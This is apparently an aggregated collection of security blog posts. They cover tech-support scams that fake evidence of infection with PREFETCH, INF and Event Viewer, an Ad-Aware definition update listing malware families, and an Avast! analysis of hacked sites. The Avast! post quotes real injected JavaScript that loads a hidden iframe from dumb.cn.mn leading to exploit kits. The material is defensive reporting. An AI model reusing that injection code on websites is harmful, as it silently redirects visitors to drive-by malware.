There's a blog article I've been wanting to write for a few days, but haven't so far been able to make time for. However, Martijn Grooten drew my attention to a blog on much the same topic from our friends at Avast! and one of ESET's partners alerted me to a very relevant and related post by Brian Krebs, so I've pushed it to the top of the stack.
I first became aware of the plague of Indian companies operating PC and anti-virus support scams because one of our competitors advised me that one of them was apparently carrying out unethical marketing on ESET's behalf. (They weren't, of course, anything to do with ESET: see this blog series and this paper.)
I recently learned from my colleagues at ESET UK that cold-callers from Mumbai have developed a new twist on this cold-calling scam, calling people in the UK and apparently claiming to offer paid support in response to problems that don't exist, because, they claim, "ESET doesn''t offer free support." (Don't panic! For genuine ESET customer support, there are contact details on the web page for the ESET partner or distributor responsible for the region in which you live.)
It appears from a recent Avast! blog that Avast! customers are suffering a similar experience, 'receiving phone calls from “Avast customer service” reps who need to take control of their computer to resolve some issue and who, for a fee, wish to charge them for this privilege.' Unfortunately, according to Brian Krebs, "users are reporting that the incidents followed experiences with iYogi, the company in India that is handling Avast’s customer support." (The relationship is confirmed by an Avast! blog here.)
While someone describing himself as the co-founder and president of marketing at iYogi has strongly denied any connection with the usual gang of out-and-out scammers, the use, as described by Krebs, of the Event Viewer ploy characteristic of Indian support scams means that iYogi is going to have to work hard to prove its innocence. My guess is that if Avast!, a company with an excellent reputation previously, discovers that iYogi is indeed operating on the side of the non-angels, heads – and outsourcing contracts – will roll.
Support services for anti-virus products obviously vary according to vendor and product. Free one-to-one support may not be available for free products, and other support may range from free but basic, to cattle-class, to business class or de-luxe. However, reputable security companies do have standards that should apply at all points on the spectrum:
Unless, of course, they partner with a support organization that doesn't see the difference between legitimate marketing and outright misrepresentation and fraud. If Avast! has, in fact, fallen into that trap, they have my sincere sympathy. But it will be hard for them to recover from that misstep, and the reputation of the rest of the AV industry has also taken a blow. We can only hope that some good will come out of this, like real progress on effective legal action against support scams.
Paying for third-party support for a free product may sound like a good idea in principle, since AV companies don't don't normally offer one-to-one support for free products. But it's generally safer to upgrade to a paid version, especially if you already suspect that you have malware on your system. The problem here is that sometimes people don't get AV until they have a problem, and at that point, saving money with a free solution may be a false economy.
Cold-calling (or spamming support forums) to offer paid support for products that already offer free support to paying customers may not sound particularly ethical (well, it doesn't to me). Worse, it may actually cause damage to your system which may even, depending on the vendor and the actual circumstances, compromise your ability to get the legitimate support you've already paid for. But it isn't necessarily fraudulent. (Or illegal, though it may go against privacy legislation covering "Do Not Call" lists, for example, though if the Krebs story is correct, the existence of a pre-existing support relationship may be used to get round that. And unfortunately, cold-callers from India tend to ignore local do-not-call lists: in fact, some legitimate companies seem to be taking advantage of offshored support to bypass such lists.)
But if the call is made on the basis of reports of malware that you don't have, or at some stage the caller tries to persuade you that utilities like INF, PREFETCH, ASSOC and EVENTVWR are proof that you have malware issues, the intent is clearly fraudulent.
Personally, I'd suggest that you regard any unsolicited phone call from a company claiming to offer antivirus support, even for a product you actually have, as a probable scam.
David Harley CITP FBCS CISSP
ESET Senior Research Fellow
Here's a quick summary of the PREFETCH and INF ploys I mentioned in a separate blog here. These are alternatives (or supplements) used by support scammers from India to the Event Viewer and ASSOC/CLSID ploys also used to "prove" to a victim that their system is infected with malware or has other security/integrity problems.
The "Prefetch" command shows the contents of C:\Windows\Prefetch, containing files used in loading programs.
The "INF" command actually shows the contents of a folder normally named C:\Windows\Inf: it contains files used in installing the system.
INF and PREFETCH are legitimate system utilities: so how are they misused by scammers? By asking a victim to press Windows-R to get the Run dialogue box, then asking them to type in something "prefetch hidden virus" or "inf trojan malware". When a folder listing like those above appears, the victim believes that the system is listing malicious files. In fact, neither of these commands accepts parameters in the Run box. You could type "inf elvish fantasy" or "prefetch me a gin and tonic" and you'd get exactly the same directory listing, showing legitimate files.
Neat trick: but don't you fall for it!
David Harley CITP FBCS CISSP
ESET Senior Research Fellow
Definition file update for Ad-Aware - combating Viruses, Spyware, Malware, Rogue software, Worms and Adware.
Updated definitions:
====================
Win32.Trojan.Agent
Win32.TrojanDownloader.Agent
Win32.TrojanDownloader.ISTBar
Win32.TrojanDownloader.Small
Win32.TrojanPWS.Magania
Win32.TrojanSpy.Zbot
Win32.Backdoor.Small
Win32.Trojan.Inject
Win32.TrojanDownloader.Injecter
Win32.TrojanDownloader.Fraudload
Win32.Worm.AutoIt
Win32.Worm.Runouce
Win32.Backdoor.Gbot
Win32.Trojan.Lebag
Win32.TrojanDownloader.CodecPack
Win32.Trojan.Fraudpack
Win32.Trojan.FakeAV
Win32.Trojan.Zapchast
Win32.Trojan.Genome
Win32.P2PWorm.Palevo
Win32.TrojanSpy.Agent
Win32.TrojanDownloader.Mufanom
Win32.TrojanRansom.Blocker
Win32.Trojan.Swizzor
Win32.Trojan.Vkhost
Win32.Adware.Gamevance
Win32.Trojan.Vbkrypt
Win32.Backdoor.Bredavi
Win32.Adware.ScreenSaver
Win32.Hoax.ArchSMS
Win32.Trojan.Jorik
Win32.Trojan.Diple
Win32.Trojan.Menti
Win32.Worm.Wbna
Win32.TrojanDropper.Dapato
Win32.Trojan.Yakes
Win32.TrojanDropper.Injector
Win32.TrojanRansom.Foreign
Win32.Worm.Ngrbot
Win32.Backdoor.Proxyier
Win32.TrojanDropper.Daws
MD5 checksum: aaw2009-excluded-build-150.756.aawdef: eacfa1b2f30d3dc3c1ca50a9c62f171b
AVG Anti-Virus, a company headquartered not too many kilometers down the road from the AVAST main offices in Prague, promoted an interview with their community manager today on Facebook. Hoping to learn a thing or two, we curiously clicked on the link. To our surprise, avast! blocked it as a malicious URL.
When we attempted to open the URL, it was redirected to dumb.cn.mn which triggered the blocking action. The only content on dumb.cn.mm is one word – GOTCHA!
Senior Virus analyst, Jan Sirmer confirmed the attack when we couldn’t repeat the block. “The site where the AVG interview was published, smcitizens.com, was hacked for sure, and redirects to a black hole site,” he said. “Malicious script on the site is checking visitor’s cookies, which is the reason why you don’t see the warning more than once.”
He went on to explain, “We receive only one word: GOTCHA. It’s probably because the attackers running on dumb site’s database with visiting IP addresses, and if they found this IP, only GOTCHA is returned. I think it helps them to be more secure from malware analysts and users looking into how they have been infected.”
After looking into the hack further, Sirmer discovered that the link to dumb.cn.mn, or its variations, was injected to other legitimate sites too. Those links then led to malicious sites containing a black hole exploit kit.
Here is a list of some other dumb sites used as links in hacked legitimate websites:
Sirmer discovered that malicious site fckarpaty.in is one of the malicious sites where users were redirected from one of the dumb sites. fckarpaty.in includes a well-known exploit pack called Crimepack. This exploit pack uses a Java vulnerability and silently downloads malicious Java, PDF and flesh files onto users computers.
In the last four days, Sirmer found that the bad guys injected a link to one of the dumb sites in 138 unique legitimate sites that were visited by avast! users. This is not such a huge number, but the attackers focused on sites like smcitizens.com which has lots of visitors.
An example of injected code:
if (document.getElementsByTagName(‘body’)[0]) { iframer(); } else { document.write(“<iframe src=’http://dumb.cn.mn/in.cgi?2′ width=’10′ height=’10′ style=’visibility:hidden;position:absolute;left:0;top:0;’></iframe>”); } function iframer() { var f = document.createElement(‘iframe’); f.setAttribute(‘src’, ‘http://dumb.cn.mn/in.cgi?2′); f.style.visibility = ‘hidden’; f.style.position = ‘absolute’; f.style.left = ’0′; f.style.top = ’0′; f.setAttribute(‘width’, ’10′); f.setAttribute(‘height’, ’10′); document.getElementsByTagName(‘body’)[0].appendChild(f); }
An image of our first visit to smcitizens.com.
And the second visit. Images provided by avast! Virus Lab.
This image has been marked to show the redirection to dumb.cn.mn.
Originally posted at InSecurity Complex
On 14/03/12 At 01:03 PM